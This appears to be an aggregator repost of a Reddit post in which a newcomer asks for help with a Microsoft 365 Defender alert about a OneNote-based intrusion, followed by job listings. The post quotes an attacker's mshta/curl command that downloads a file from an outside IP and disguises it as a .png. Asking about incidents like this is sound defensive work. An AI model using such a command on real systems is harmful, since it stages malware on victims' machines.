all InfoSec news
Newbie looking for help and pointers
Feb. 6, 2023, 7:12 p.m. | /u/Praezin
cybersecurity www.reddit.com
Situation, alert in MS365 defender:
1- user opens a onenote notebook
2- onenote.exe performs suspicius LDAP query
3- curl commands attempts execution via mshta.exe ("curl.exe" --output C:\\ProgramData\\aliMhW.png --url http:// IP of CSP/15581.dat)
4- mshta.exe was audited by the attack surface reduction (ASR) rule …
access alert applications asr attack attack surface block career child cybersecurity defender initial access ldap notebook office onenote processes query system
More from www.reddit.com / cybersecurity
Jobs in InfoSec / Cybersecurity
Incident Response Lead
@ Blue Yonder | Hyderabad
GRC Analyst
@ Chubb | Malaysia
Information Security Manager
@ Walbec Group | Waukesha, WI, United States
Senior Executive / Manager, Security Ops (TSSQ)
@ SMRT Corporation Ltd | Singapore, SG
Senior Engineer, Cybersecurity
@ Sonova Group | Valencia (CA), United States
Consultant (Multiple Positions Available)
@ Atos | Plano, TX, US, 75093